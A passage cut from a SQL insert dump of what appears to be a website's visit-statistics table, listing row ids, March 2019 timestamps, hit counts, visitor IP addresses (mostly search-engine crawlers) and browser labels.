0,0,'54.36.148.137','other'),(396651,1552038689,1,1,0,0,'54.36.148.218','other'),(396652,1552038828,1,1,0,0,'54.36.148.103','other'),(396653,1552038846,1,1,0,0,'66.249.64.218','chrome'),(396654,1552039137,1,1,0,0,'54.36.148.117','other'),(396655,1552039203,1,1,0,0,'54.36.149.37','other'),(396656,1552039296,2,2,0,0,'5.45.207.79','other'),(396657,1552039323,1,1,0,0,'66.249.64.220','chrome'),(396658,1552039340,1,1,0,0,'54.36.150.67','other'),(396659,1552039865,3,3,0,0,'5.45.207.19','other'),(396660,1552039925,1,1,0,0,'54.36.148.242','other'),(396661,1552040213,2,2,0,0,'95.108.213.4','other'),(396662,1552040283,1,1,0,0,'216.244.66.241','other'),(396663,1552040343,1,1,0,0,'178.154.244.11','other'),(396664,1552040347,2,2,0,0,'37.9.113.148','other'),(396665,1552040385,1,1,0,0,'40.77.167.211','other'),(396666,1552040463,2,2,0,0,'37.9.113.20','other'),(396667,1552040469,2,2,0,0,'141.8.142.103','other'),(396668,1552041029,1,1,0,0,'180.76.15.151','other'),(396669,1552041070,1,1,0,0,'54.36.149.6','other'),(396670,1552041185,1,1,0,0,'37.9.113.103','other'),(396671,1552041347,1,1,0,0,'5.45.207.19','other'),(396672,1552041647,3,3,0,0,'141.8.142.103','other'),(396673,1552041780,1,1,0,0,'54.36.148.121','other'),(396674,1552041919,2,2,0,0,'8.29.198.25','other'),(396675,1552042087,1,1,0,0,'178.154.244.11','other'),(396676,1552042243,1,1,0,0,'40.77.167.104','other'),(396677,1552042349,1,1,0,0,'207.46.13.106','other'),(396678,1552042637,1,1,0,0,'46.229.168.136','other'),(396679,1552042853,2,2,0,0,'5.45.207.19','other'),(396680,1552043236,1,1,0,0,'54.36.148.25','other'),(396681,1552043627,1,1,0,0,'54.36.149.31','other'),(396682,1552043709,1,1,0,0,'54.36.150.122','other'),(396683,1552044037,1,1,0,0,'54.36.148.88','other'),(396684,1552044248,1,1,0,0,'54.36.150.29','other'),(396685,1552044276,1,1,0,0,'54.36.150.168','other'),(396686,1552044295,1,1,0,0,'54.36.150.167','other'),(396687,1552044345,1,1,0,0,'66.249.64.222','chrome'),(396688,1552044424,1,1,0,0,'5.45.207.79','other'),(396689,1552044667,1,1,0,0,'46.229.168.145','other'),(396690,1552044713,2,2,0,0,'40.77.167.211','other'),(396691,1552044925,1,1,0,0,'46.229.168.134','other'),(396692,1552045104,1,1,0,0,'54.36.150.84','other'),(396693,1552045318,1,1,0,0,'178.154.244.11','other'),(396694,1552045387,1,1,0,0,'95.163.255.49','other'),(396695,1552045566,1,1,0,0,'54.36.149.55','other'),(396696,1552045694,1,1,0,0,'54.36.150.115','other'),(396697,1552046073,1,1,0,0,'66.249.64.222','chrome'),(396698,1552046205,1,1,0,0,'54.36.149.27','other'),(396699,1552046221,1,1,0,0,'46.229.168.136','other'),(396700,1552046312,1,1,0,0,'46.229.168.144','other'),(396701,1552046373,1,1,0,0,'54.36.148.180','other'),(396702,1552047138,1,1,0,0,'185.249.197.229','other'),(396703,1552047164,1,1,0,0,'54.36.148.55','other'),(396704,1552047276,1,1,0,0,'54.36.148.180','other'),(396705,1552047527,1,1,0,0,'141.8.142.103','other'),(396706,1552047732,2,2,0,0,'66.249.64.222','chrome'),(396707,1552047745,1,1,0,0,'180.76.15.147','other'),(396708,1552047897,1,1,0,0,'54.36.148.54','other'),(396709,1552048599,1,1,0,0,'216.244.66.241','other'),(396710,1552048721,1,1,0,0,'54.36.150.145','other'),(396711,1552048819,1,1,0,0,'209.17.97.98','other'),(396712,1552048849,1,1,0,0,'66.249.64.222','chrome'),(396713,1552048868,1,1,0,0,'176.9.9.94','other'),(396714,1552049205,1,1,0,0,'207.46.13.32','other'),(396715,1552049236,1,1,0,0,'46.229.168.144','other'),(396716,1552049425,1,1,0,0,'54.36.148.94','other'),(396717,1552049450,1,1,0,0,'54.36.148.153','other'),(396718,1552049789,1,1,0,0,'54.36.148.82','other'),(396719,1552050054,1,1,0,0,'54.36.148.127','other'),(396720,1552050181,1,1,0,0,'54.36.148.171','other'),(396721,1552050229,1,1,0,0,'95.163.255.43','other'),(396722,1552050255,1,1,0,0,'66.249.64.218','chrome'),(396723,1552050364,1,1,0,0,'54.36.148.49','other'),(396724,1552050408,1,1,0,0,'54.36.148.222','other'),(396725,1552050538,1,1,0,0,'66.249.64.222','chrome'),(396726,1552050981,1,1,0,0,'54.36.150.158','other'),(396727,1552051523,1,1,0,0,'54.36.148.95','other'),(396728,1552052152,1,1,0,0,'66.249.64.218','chrome'),(396729,1552052675,1,1,0,0,'54.36.150.187','other'),(396730,1552052787,1,1,0,0,'54.36.150.73','other'),(396731,1552052789,1,1,0,0,'8.29.198.25','other'),(396732,1552052872,1,1,0,0,'8.29.198.27','other'),(396733,1552053076,1,1,0,0,'54.36.150.190','other'),(396734,1552053162,1,1,0,0,'54.36.150.2','other'),(396735,1552053397,1,1,0,0,'207.46.13.32','other'),(396736,1552053628,1,1,0,0,'157.55.39.198','other'),(396737,1552054016,3,3,0,0,'216.244.66.241','other'),(396738,1552054156,1,1,0,0,'91.196.178.180','chrome'),(396739,1552054410,1,1,0,0,'207.46.13.32','other'),(396740,1552054449,1,1,0,0,'54.36.148.224','other'),(396741,1552054661,1,1,0,0,'54.36.150.43','other'),(396742,1552054785,1,1,0,0,'54.36.148.168','other'),(396743,1552055068,1,1,0,0,'54.36.149.67','other'),(396744,1552055276,1,1,0,0,'54.36.150.35','other'),(396745,1552055658,4,4,0,0,'40.77.167.161','other'),(396746,1552055722,1,1,0,0,'91.196.178.180','chrome'),(396747,1552055929,1,1,0,0,'40.77.167.103','other'),(396748,1552056186,1,1,0,0,'95.163.255.46','other'),(396749,1552056865,1,1,0,0,'54.36.148.202','other'),(396750,1552056878,1,1,0,0,'66.249.64.218','chrome'),(396751,1552056915,4,4,0,0,'5.45.207.79','other'),(396752,1552057064,1,1,0,0,'5.45.207.19','other'),(396753,1552057419,3,3,0,0,'178.154.244.11','other'),(396754,1552057610,2,2,0,0,'141.8.142.103','other'),(396755,1552057753,1,1,0,0,'66.249.64.220','chrome'),(396756,1552057851,1,1,0,0,'5.45.207.79','other'),(396757,1552057852,1,1,0,0,'46.229.168.129','other'),(396758,1552057945,1,1,0,0,'54.36.148.98','other'),(396759,1552058206,1,1,0,0,'54.36.148.100','other'),(396760,1552058250,3,3,0,0,'5.45.207.19','other'),(396761,1552058426,1,1,0,0,'40.77.167.103','other'),(396762,1552058469,1,1,0,0,'66.249.64.218','chrome'),(396763,1552058876,1,1,0,0,'54.36.150.19','other'),(396764,1552058934,1,1,0,0,'54.36.149.6','other'),(396765,1552059050,1,1,0,0,'54.36.150.130','other'),(396766,1552059338,1,1,0,0,'207.46.13.206','other'),(396767,1552059447,1,1,0,0,'54.36.148.43','other'),(396768,1552059632,1,1,0,0,'54.36.150.183','other'),(396769,1552060164,1,1,0,0,'54.36.148.152','other'),(396770,1552060449,1,1,0,0,'46.229.168.143','other'),(396771,1552060565,1,1,0,0,'54.36.150.179','other'),(396772,1552060767,1,1,0,0,'54.36.148.109','other'),(396773,1552060870,1,1,0,0,'207.46.13.130','other'),(396774,1552061616,1,1,0,0,'46.229.168.140','other'),(396775,1552061644,1,1,0,0,'54.36.150.164','other'),(396776,1552061873,1,1,0,0,'193.194.124.221','firefox'),(396777,1552062786,1,1,0,0,'54.36.149.105','other'),(396778,1552062799,1,1,0,0,'40.77.167.103','other'),(396779,1552062884,2,2,0,0,'66.249.64.220','chrome'),(396780,1552063031,1,1,0,0,'66.249.64.218','chrome'),(396781,1552063190,1,1,0,0,'54.36.150.126','other'),(396782,1552063583,1,1,0,0,'178.154.244.11','other'),(396783,1552063621,1,1,0,0,'176.9.9.94','other'),(396784,1552063648,1,1,0,0,'8.29.198.25','other'),(396785,1552063738,1,1,0,0,'8.29.198.27','other'),(396786,1552063765,1,1,0,0,'54.36.148.242','other'),(396787,1552063841,1,1,0,0,'54.36.150.23','other'),(396788,1552063888,1,1,0,0,'54.36.149.85','other'),(396789,1552064697,1,1,0,0,'54.36.148.203','other'),(396790,1552065392,1,1,0,0,'54.36.148.11','other'),(396791,1552065609,1,1,0,0,'54.36.148.6','other'),(396792,1552065859,1,1,0,0,'157.55.39.97','other'),(396793,1552066119,1,1,0,0,'87.250.224.47','other'),(396794,1552066181,2,2,0,0,'46.229.168.137','other'),(396795,1552066710,2,2,0,0,'66.249.66.136','chrome'),(396796,1552066764,1,1,0,0,'54.36.148.130','other'),(396797,1552067104,1,1,0,0,'54.36.150.158','other'),(396798,1552067137,1,1,0,0,'54.36.148.205','other'),(396799,1552067285,2,2,0,0,'77.111.244.217','chrome'),(396800,1552067305,1,1,0,0,'54.36.148.187','other'),(396801,1552067397,1,1,0,0,'40.77.167.103','other'),(396802,1552067634,1,1,0,0,'54.36.150.169','other'),(396803,1552067678,1,1,0,0,'77.111.244.41','chrome'),(396804,1552068209,1,1,0,0,'54.36.148.188','other'),(396805,1552068810,1,1,0,0,'54.36.150.33','other'),(396806,1552069029,1,1,0,0,'54.36.149.6','other'),(396807,1552069727,1,1,0,0,'54.36.148.13','other'),(396808,1552070243,1,1,0,0,'66.249.66.134','chrome'),(396809,1552070381,1,1,0,0,'216.244.66.241','other'),(396810,1552070409,1,1,0,0,'91.196.122.202','chrome'),(396811,1552070519,1,1,0,0,'91.196.178.104','chrome'),(396812,1552070651,1,1,0,0,'194.113.106.11','chrome'),(396813,1552070720,1,1,0,0,'54.36.148.130','other'),(396814,1552070819,1,1,0,0,'46.229.168.132','other'),(396815,1552071030,1,1,0,0,'37.115.186.35','chrome'),(396816,1552071192,2,2,0,0,'157.55.39.222','other'),(396817,1552071262,1,1,0,0,'46.118.113.164','chrome'),(396818,1552071836,1,1,0,0,'46.229.168.143','other'),(396819,1552071992,1,1,0,0,'176.113.170.104','chrome'),(396820,1552072016,1,1,0,0,'46.229.168.129','other'),(396821,1552072421,1,1,0,0,'216.244.66.241','other'),(396822,1552072572,1,1,0,0,'54.36.150.146','other'),(396823,1552072577,1,1,0,0,'54.36.150.81','other'),(396824,1552072705,1,1,0,0,'46.229.168.133','other'),(396825,1552072743,1,1,0,0,'5.188.210.53','chrome'),(396826,1552072948,1,1,0,0,'54.36.150.158','other'),(396827,1552073442,1,1,0,0,'54.36.149.3','other'),(396828,1552073708,1,1,0,0,'54.36.149.13','other'),(396829,1552073766,1,1,0,0,'66.249.66.136','chrome'),(396830,1552073961,1,1,0,0,'40.77.167.103','other'),(396831,1552073993,1,1,0,0,'54.36.148.143','other'),(396832,1552074353,1,1,0,0,'157.55.39.252','other'),(396833,1552074517,1,1,0,0,'8.29.198.27','other'),(396834,1552074558,1,1,0,0,'54.36.148.2','other'),(396835,1552074599,1,1,0,0,'8.29.198.26','other'),(396836,1552074602,3,3,0,0,'5.45.207.79','other'),(396837,1552074611,2,2,0,0,'5.45.207.19','other'),(396838,1552074915,2,2,0,0,'178.154.244.11','other'),(396839,1552075085,2,2,0,0,'216.244.66.241','other'),(396840,1552075260,4,4,0,0,'141.8.142.103','other'),(396841,1552075344,1,1,0,0,'46.229.168.142','other'),(396842,1552075368,2,2,0,0,'66.249.66.134','chrome'),(396843,1552075468,1,1,0,0,'54.36.150.75','other'),(396844,1552075498,1,1,0,0,'37.9.113.148','other'),(396845,1552075537,1,1,0,0,'46.229.168.130','other'),(396846,1552075561,1,1,0,0,'66.249.66.136','chrome'),(396847,1552075696,1,1,0,0,'157.55.39.222','other'),(396848,1552075708,1,1,0,0,'46.229.168.129','other'),(396849,1552075722,1,1,0,0,'40.77.167.103','other'),(396850,1552075928,1,1,0,0,'37.115.186.35','chrome'),(396851,1552075949,2,2,0,0,'178.154.244.11','other'),(396852,1552075993,4,4,0,0,'5.45.207.79','other'),(396853,1552076019,1,1,0,0,'95.108.213.4','other'),(396854,1552076114,1,1,0,0,'5.45.207.19','other'),(396855,1552076464,1,1,0,0,'46.118.113.164','chrome'),(396856,1552076506,1,1,0,0,'54.36.148.5','other'),(396857,1552076510,4,4,0,0,'141.8.142.103','other'),(396858,1552076579,1,1,0,0,'54.36.148.168','other'),(396859,1552076879,2,2,0,0,'178.154.244.11','other'),(396860,1552076914,1,1,0,0,'46.229.168.151','other'),(396861,1552077058,2,2,0,0,'5.45.207.79','other'),(396862,1552077086,1,1,0,0,'54.36.150.95','other'),(396863,1552077094,1,1,0,0,'5.45.207.19','other'),(396864,1552077097,1,1,0,0,'54.36.150.11','other'),(396865,1552077103,1,1,0,0,'54.36.148.113','other'),(396866,1552077142,1,1,0,0,'54.36.148.35','other'),(396867,1552077689,1,1,0,0,'46.229.168.132','other'),(396868,1552078171,1,1,0,0,'66.249.66.138','chrome'),(396869,1552078350,1,1,0,0,'66.249.66.60','chrome'),(396870,1552078453,1,1,0,0,'54.36.150.14','other'),(396871,1552078886,1,1,0,0,'207.46.13.181','other'),(396872,1552078994,1,1,0,0,'66.249.66.134','chrome'),(396873,1552079192,1,1,0,0,'66.249.66.138','chrome'),(396874,1552079635,1,1,0,0,'46.229.168.149','other'),(396875,1552079693,1,1,0,0,'54.36.148.118','other'),(396876,1552080015,1,1,0,0,'104.132.61.91','chrome'),(396877,1552080148,1,1,0,0,'54.36.150.95','other'),(396878,1552080621,1,1,0,0,'54.36.148.87','other'),(396879,1552080630,1,1,0,0,'46.229.168.143','other'),(396880,1552081124,1,1,0,0,'54.36.148.200','other'),(396881,1552081505,1,1,0,0,'46.229.168.140','other'),(396882,1552082266,1,1,0,0,'207.46.13.181','other'),(396883,1552082288,1,1,0,0,'66.249.66.136','chrome'),(396884,1552082515,1,1,0,0,'54.36.150.105','other'),(396885,1552082548,1,1,0,0,'54.36.148.1','other'),(396886,1552082963,1,1,0,0,'54.36.148.119','other'),(396887,1552083177,1,1,0,0,'207.46.13.181','other'),(396888,1552083354,1,1,0,0,'66.249.66.134','chrome'),(396889,1552083945,1,1,0,0,'207.46.13.94','other'),(396890,1552083982,1,1,0,0,'54.36.150.65','other'),(396891,1552084219,2,2,0,0,'5.45.207.19','other'),(396892,1552084469,1,1,0,0,'207.46.13.236','other'),(396893,1552084512,1,1,0,0,'54.36.148.207','other'),(396894,1552084514,1,1,0,0,'54.36.148.88','other'),(396895,1552084933,1,1,0,0,'54.36.150.120','other'),(396896,1552085002,1,1,0,0,'66.249.66.138','chrome'),(396897,1552085113,1,1,0,0,'95.108.213.4','other'),(396898,1552085372,2,2,0,0,'8.29.198.27','other'),(396899,1552085559,1,1,0,0,'216.244.66.241','other'),(396900,1552085642,2,2,0,0,'207.46.13.4','other'),(396901,1552086042,1,1,0,0,'54.36.148.220','other'),(396902,1552086067,1,1,0,0,'54.36.149.76','other'),(396903,1552086080,1,1,0,0,'54.36.148.140','other'),(396904,1552086515,1,1,0,0,'46.229.168.130','other'),(396905,1552086791,1,1,0,0,'54.36.148.200','other'),(396906,1552087089,1,1,0,0,'54.36.150.179','other'),(396907,1552087293,1,1,0,0,'66.249.66.136','chrome'),(396908,1552087460,2,2,0,0,'66.249.66.138','chrome'),(396909,1552087659,2,2,0,0,'54.36.149.54','other'),(396910,1552087740,1,1,0,0,'46.229.168.136','other'),(396911,1552088492,1,1,0,0,'54.36.148.58','other'),(396912,1552088518,1,1,0,0,'207.46.13.181','other'),(396913,1552088726,1,1,0,0,'216.244.66.241','other'),(396914,1552089066,1,1,0,0,'46.229.168.143','other'),(396915,1552090106,1,1,0,0,'54.36.148.165','other'),(396916,1552090159,1,1,0,0,'176.9.9.94','other'),(396917,1552090395,1,1,0,0,'54.36.148.211','other'),(396918,1552090397,1,1,0,0,'207.46.13.181','other'),(396919,1552090406,1,1,0,0,'54.36.149.94','other'),(396920,1552090539,1,1,0,0,'185.220.100.252','chrome'),(396921,1552090541,1,1,0,0,'185.220.102.4','chrome'),(396922,1552090543,1,1,0,0,'199.195.250.77','chrome'),(396923,1552090547,1,1,0,0,'54.37.234.66','chrome'),(396924,1552090883,2,2,0,0,'178.17.174.14','chrome'),(396925,1552090885,1,1,0,0,'51.15.92.212','chrome'),(396926,1552090887,1,1,0,0,'77.247.181.163','chrome'),(396927,1552090893,1,1,0,0,'23.129.64.106','chrome'),(396928,1552090895,1,1,0,0,'85.248.227.164','chrome'),(396929,1552090916,1,1,0,0,'46.165.254.166','chrome'),(396930,1552091138,1,1,0,0,'171.25.193.20','chrome'),(396931,1552091157,1,1,0,0,'51.68.143.229','chrome'),(396932,1552091161,1,1,0,0,'185.104.120.60','chrome'),(396933,1552091280,1,1,0,0,'54.36.150.163','other'),(396934,1552091282,1,1,0,0,'197.231.221.211','chrome'),(396935,1552091314,1,1,0,0,'188.166.9.235','chrome'),(396936,1552091337,1,1,0,0,'216.244.66.241','other'),(396937,1552091576,1,1,0,0,'207.46.13.181','other'),(396938,1552091623,1,1,0,0,'199.249.230.64','chrome'),(396939,1552091656,1,1,0,0,'89.234.157.254','chrome'),(396940,1552091672,1,1,0,0,'54.36.150.29','other'),(396941,1552091760,1,1,0,0,'195.176.3.20','chrome'),(396942,1552091777,1,1,0,0,'54.36.150.102','other'),(396943,1552091978,1,1,0,0,'54.36.150.91','other'),(396944,1552092219,1,1,0,0,'46.229.168.135','other'),(396945,1552092270,1,1,0,0,'40.77.167.20','other'),(396946,1552092661,1,1,0,0,'66.249.66.138','chrome'),(396947,1552092726,1,1,0,0,'54.36.148.87','other'),(396948,1552093128,1,1,0,0,'95.108.213.4','other'),(396949,1552093129,1,1,0,0,'54.36.150.169','other'),(396950,1552093261,3,3,0,0,'178.154.244.11','other'),(396951,1552093324,3,3,0,0,'5.45.207.79','other'),(396952,1552093329,1,1,0,0,'54.36.149.22','other'),(396953,1552093352,1,1,0,0,'87.250.224.47','other'),(396954,1552093498,1,1,0,0,'54.36.150.160','other'),(396955,1552093582,2,2,0,0,'5.45.207.19','other'),(396956,1552093989,1,1,0,0,'54.36.148.241','other'),(396957,1552094198,1,0,1,0,'66.249.66.136',''),(396958,1552094322,1,1,0,0,'54.36.148.145','other'),(396959,1552094593,1,1,0,0,'54.36.148.187','other'),(396960,1552094665,1,1,0,0,'54.36.150.78','other'),(396961,1552095331,1,1,0,0,'54.36.150.83','other'),(396962,1552095935,1,1,0,0,'54.36.148.131','other'),(396963,1552095947,1,1,0,0,'46.229.168.138','other'),(396964,1552096034,1,1,0,0,'66.249.66.134','chrome'),(396965,1552096213,2,2,0,0,'8.29.198.27','other'),(396966,1552096372,1,1,0,0,'46.229.168.129','other'),(396967,1552096456,2,2,0,0,'54.202.172.7','chrome'),(396968,1552096579,1,1,0,0,'54.36.148.179','other'),(396969,1552096957,1,1,0,0,'46.229.168.148','other'),(396970,1552097004,1,1,0,0,'40.77.167.20','other'),(396971,1552097297,1,1,0,0,'54.36.150.103','other'),(396972,1552098004,1,1,0,0,'54.36.148.244','other'),(396973,1552098322,1,1,0,0,'40.77.167.103','other'),(396974,1552098454,1,1,0,0,'54.36.148.219','other'),(396975,1552098533,1,1,0,0,'157.55.39.181','other'),(396976,1552098708,1,1,0,0,'40.77.167.20','other'),(396977,1552099453,1,1,0,0,'46.229.168.136','other'),(396978,1552099524,1,1,0,0,'46.229.168.129','other'),(396979,1552100611,1,1,0,0,'54.36.149.79','other'),(396980,1552100626,1,1,0,0,'54.36.150.81','other'),(396981,1552100629,1,1,0,0,'46.229.168.147','other'),(396982,1552100906,1,1,0,0,'66.249.66.58','chrome'),(396983,1552101112,1,1,0,0,'54.36.148.85','other'),(396984,1552101201,2,2,0,0,'40.77.167.20','other'),(396985,1552101460,1,1,0,0,'66.249.66.60','chrome'),(396986,1552101919,1,1,0,0,'46.229.168.148','other'),(396987,1552101926,2,2,0,0,'157.55.39.172','other'),(396988,1552101982,1,1,0,0,'207.46.13.181','other'),(396989,1552102049,1,1,0,0,'54.36.148.103','other'),(396990,1552102108,1,1,0,0,'54.36.148.31','other'),(396991,1552102478,1,1,0,0,'54.36.149.1','other'),(396992,1552102553,1,1,0,0,'54.36.150.124','other'),(396993,1552102853,1,1,0,0,'176.9.9.94','other'),(396994,1552102978,1,1,0,0,'46.229.168.149','other'),(396995,1552103309,1,1,0,0,'54.36.148.61','other'),(396996,1552103703,1,1,0,0,'157.55.39.172','other'),(396997,1552104156,1,1,0,0,'54.36.148.213','other'),(396998,1552104174,1,1,0,0,'46.229.168.142','other'),(396999,1552104335,1,1,0,0,'54.36.150.128','other'),(397000,1552104361,1,1,0,0,'54.36.148.120','other'),(397001,1552104694,1,1,0,0,'54.36.148.8','other'),(397002,1552104871,1,1,0,0,'40.77.167.20','other'),(397003,1552104973,1,1,0,0,'54.36.148.231','other'),(397004,1552105893,1,1,0,0,'54.36.150.17','other'),(397005,1552105936,1,1,0,0,'46.229.168.135','other'),(397006,1552106080,1,1,0,0,'46.229.168.134','other'),(397007,1552106090,1,1,0,0,'54.36.148.163','other'),(397008,1552106182,1,1,0,0,'46.229.168.137','other'),(397009,1552106597,1,1,0,0,'157.55.39.172','other'),(397010,1552106779,1,1,0,0,'54.36.148.206','other'),(397011,1552106915,1,1,0,0,'54.36.148.183','other'),(397012,1552107063,2,2,0,0,'8.29.198.26','other'),(397013,1552107212,2,2,0,0,'40.77.167.20','other'),(397014,1552107299,1,1,0,0,'54.36.150.41','other'),(397015,1552107510,1,1,0,0,'157.55.39.172','other'),(397016,1552107540,1,1,0,0,'54.36.148.55','other'),(397017,1552107982,1,1,0,0,'54.36.149.17','other'),(397018,1552108115,1,1,0,0,'54.36.148.87','other'),(397019,1552108407,1,1,0,0,'54.36.150.66','other'),(397020,1552108446,1,1,0,0,'91.196.178.133','firefox'),(397021,1552108526,1,1,0,0,'207.46.13.245','other'),(397022,1552108531,1,1,0,0,'207.46.13.237','other'),(397023,1552108708,1,1,0,0,'66.249.66.134','chrome'),(397024,1552108732,1,1,0,0,'54.36.148.81','other'),(397025,1552108914,1,1,0,0,'180.76.15.32','other'),(397026,1552109492,1,1,0,0,'54.36.148.254','other'),(397027,1552109507,1,1,0,0,'46.229.168.141','other'),(397028,1552109618,1,1,0,0,'157.55.39.172','other'),(397029,1552109968,1,1,0,0,'46.229.168.142','other'),(397030,1552110425,1,1,0,0,'178.154.244.11','other'),(397031,1552110802,1,1,0,0,'141.8.142.103','other'),(397032,1552110915,1,1,0,0,'180.76.15.14','other'),(397033,1552111022,1,1,0,0,'54.36.149.24','other'),(397034,1552111029,1,1,0,0,'54.36.150.153','other'),(397035,1552111048,1,1,0,0,'54.36.149.106','other'),(397036,1552111101,1,1,0,0,'178.154.171.24','other'),(397037,1552111238,1,1,0,0,'54.36.148.205','other'),(397038,1552111423,2,2,0,0,'5.45.207.79','other'),(397039,1552111546,2,2,0,0,'5.45.207.19','other'),(397040,1552111616,1,1,0,0,'54.36.148.110','other'),(397041,1552112025,2,2,0,0,'95.108.213.4','other'),(397042,1552112199,1,1,0,0,'54.36.148.66','other'),(397043,1552112201,3,3,0,0,'87.250.224.47','other'),(397044,1552112276,1,1,0,0,'40.77.167.20','other'),(397045,1552112278,2,2,0,0,'141.8.142.103','other'),(397046,1552112467,1,1,0,0,'46.229.168.137','other'),(397047,1552112489,1,1,0,0,'54.36.148.1','other'),(397048,1552112541,3,3,0,0,'178.154.244.11','other'),(397049,1552112565,1,1,0,0,'185.220.101.0','other'),(397050,1552112601,1,1,0,0,'54.36.148.136','other'),(397051,1552112620,1,1,0,0,'5.45.207.19','other'),(397052,1552112639,1,1,0,0,'54.36.149.61','other'),(397053,1552112882,2,2,0,0,'5.45.207.79','other'),(397054,1552112970,1,1,0,0,'46.229.168.140','other'),(397055,1552113128,1,1,0,0,'54.36.148.162','other'),(397056,1552113342,1,1,0,0,'54.36.149.68','other'),(397057,1552113518,1,1,0,0,'178.154.244.11','other'),(397058,1552113688,1,1,0,0,'141.8.142.103','other'),(397059,1552114137,1,1,0,0,'54.36.149.52','other'),(397060,1552114692,1,1,0,0,'54.36.150.60','other'),(397061,1552114903,1,1,0,0,'54.36.148.118','other'),(397062,1552115255,1,1,0,0,'5.45.207.79','other'),(397063,1552115509,1,1,0,0,'54.36.149.7','other'),(397064,1552115772,1,1,0,0,'66.249.66.136','chrome'),(397065,1552115786,1,1,0,0,'54.36.149.76','other'),(397066,1552115859,2,2,0,0,'176.9.9.94','other'),(397067,1552116001,1,1,0,0,'54.36.148.52','other'),(397068,1552116393,1,1,0,0,'46.229.168.140','other'),(397069,1552116466,1,1,0,0,'54.36.150.64','other'),(397070,1552116507,1,1,0,0,'54.36.150.167','other'),(397071,1552116571,1,1,0,0,'46.229.168.136','other'),(397072,1552116592,1,1,0,0,'207.46.13.39','other'),(397073,1552116613,1,1,0,0,'46.229.168.151','other'),(397074,1552116649,1,1,0,0,'54.36.150.133','other'),(397075,1552116773,1,1,0,0,'54.36.148.68','other'),(397076,1552117023,2,2,0,0,'54.36.148.201','other'),(397077,1552117107,1,1,0,0,'5.45.207.79','other'),(397078,1552117114,1,1,0,0,'54.36.150.20','other'),(397079,1552117129,1,1,0,0,'178.154.244.11','other'),(397080,1552117141,1,1,0,0,'141.8.142.103','other'),(397081,1552117325,1,1,0,0,'54.36.150.1','other'),(397082,1552117361,1,1,0,0,'54.36.148.71','other'),(397083,1552117764,1,1,0,0,'54.36.148.255','other'),(397084,1552117788,1,1,0,0,'54.36.148.164','other'),(397085,1552117905,1,1,0,0,'8.29.198.26','other'),(397086,1552117930,1,1,0,0,'66.249.66.60','chrome'),(397087,1552117999,1,1,0,0,'8.29.198.25','other'),(397088,1552118146,1,1,0,0,'54.36.150.97','other'),(397089,1552118214,1,1,0,0,'216.244.66.241','other'),(397090,1552118240,1,1,0,0,'5.45.207.19','other'),(397091,1552118524,1,1,0,0,'54.36.150.72','other'),(397092,1552118613,1,1,0,0,'54.36.148.48','other'),(397093,1552118633,1,1,0,0,'40.77.167.20','other'),(397094,1552118883,1,1,0,0,'54.36.148.91','other'),(397095,1552119078,1,1,0,0,'157.55.39.225','other'),(397096,1552119615,1,1,0,0,'46.229.168.129','other'),(397097,1552119866,1,1,0,0,'54.36.148.226','other'),(397098,1552119878,1,1,0,0,'54.36.149.38','other'),(397099,1552120676,1,1,0,0,'54.36.148.39','other'),(397100,1552120877,1,1,0,0,'54.36.148.172','other'),(397101,1552120907,1,1,0,0,'46.229.168.130','other'),(397102,1552121026,1,1,0,0,'216.244.66.241','other'),(397103,1552121183,3,3,0,0,'69.58.178.57','other'),(397104,1552121279,2,2,0,0,'66.249.66.134','chrome'),(397105,1552121391,1,1,0,0,'46.229.168.141','other'),(397106,1552121426,1,1,0,0,'46.229.168.132','other'),(397107,1552121497,1,1,0,0,'91.196.178.176','chrome'),(397108,1552122137,1,1,0,0,'54.36.150.157','other'),(397109,1552122508,1,1,0,0,'157.55.39.211','other'),(397110,1552123100,1,1,0,0,'40.77.167.179','other'),(397111,1552123431,1,1,0,0,'157.55.39.147','other'),(397112,1552123838,1,1,0,0,'207.46.13.16','other'),(397113,1552124229,1,1,0,0,'54.36.150.105','other'),(397114,1552124511,1,1,0,0,'54.36.150.117','other'),(397115,1552124888,1,1,0,0,'54.36.148.80','other'),(397116,1552125151,1,1,0,0,'66.249.66.138','chrome'),(397117,1552125357,1,1,0,0,'54.36.150.111','other'),(397118,1552125993,1,1,0,0,'54.36.148.76','other'),(397119,1552126353,1,1,0,0,'54.36.148.21','other'),(397120,1552126474,1,1,0,0,'54.36.148.80','other'),(397121,1552126545,2,2,0,0,'91.209.11.236','other'),(397122,1552126728,1,1,0,0,'46.229.168.144','other'),(397123,1552126758,1,1,0,0,'54.36.150.152','other'),(397124,1552126873,1,1,0,0,'54.36.150.39','other'),(397125,1552126970,1,1,0,0,'46.229.168.149','other'),(397126,1552127407,1,1,0,0,'54.36.150.45','other'),(397127,1552127473,2,2,0,0,'91.209.11.236','other'),(397128,1552127520,1,1,0,0,'37.115.186.35','chrome'),(397129,1552127522,1,1,0,0,'46.118.113.164','chrome'),(397130,1552127535,2,2,0,0,'66.249.66.136','chrome'),(397131,1552127989,2,2,0,0,'178.154.244.11','other'),(397132,1552128139,1,1,0,0,'54.36.150.69','other'),(397133,1552128148,1,1,0,0,'54.36.149.87','other'),(397134,1552128750,1,1,0,0,'8.29.198.26','other'),(397135,1552128769,1,1,0,0,'54.36.150.141','other'),(397136,1552128841,1,1,0,0,'8.29.198.27','other'),(397137,1552129381,1,1,0,0,'54.36.150.55','other'),(397138,1552129785,1,1,0,0,'54.36.150.130','other'),(397139,1552130207,1,1,0,0,'54.36.148.126','other'),(397140,1552130473,1,1,0,0,'54.36.149.4','other'),(397141,1552130504,1,1,0,0,'46.229.168.141','other'),(397142,1552130546,3,3,0,0,'66.249.66.138','chrome'),(397143,1552130605,1,1,0,0,'54.36.148.92','other'),(397144,1552130733,1,1,0,0,'54.36.148.101','other'),(397145,1552130758,1,1,0,0,'54.36.150.79','other'),(397146,1552130865,1,1,0,0,'54.36.148.170','other'),(397147,1552131249,1,1,0,0,'54.36.148.124','other'),(397148,1552132095,1,1,0,0,'46.118.155.61','chrome'),(397149,1552132231,1,1,0,0,'54.36.148.207','other'),(397150,1552132391,1,1,0,0,'54.36.150.31','other'),(397151,1552132466,1,1,0,0,'91.237.107.42','chrome'),(397152,1552132583,1,1,0,0,'176.9.9.94','other'),(397153,1552133167,1,1,0,0,'54.36.149.0','other'),(397154,1552133220,1,1,0,0,'54.36.150.97','other'),(397155,1552133527,1,1,0,0,'54.36.150.112','other'),(397156,1552133589,1,1,0,0,'54.36.149.102','other'),(397157,1552133596,1,1,0,0,'46.229.168.134','other'),(397158,1552133724,1,1,0,0,'216.244.66.241','other'),(397159,1552133737,1,1,0,0,'52.53.201.78','chrome'),(397160,1552134005,1,1,0,0,'66.249.66.136','chrome'),(397161,1552134579,1,1,0,0,'54.36.149.19','other'),(397162,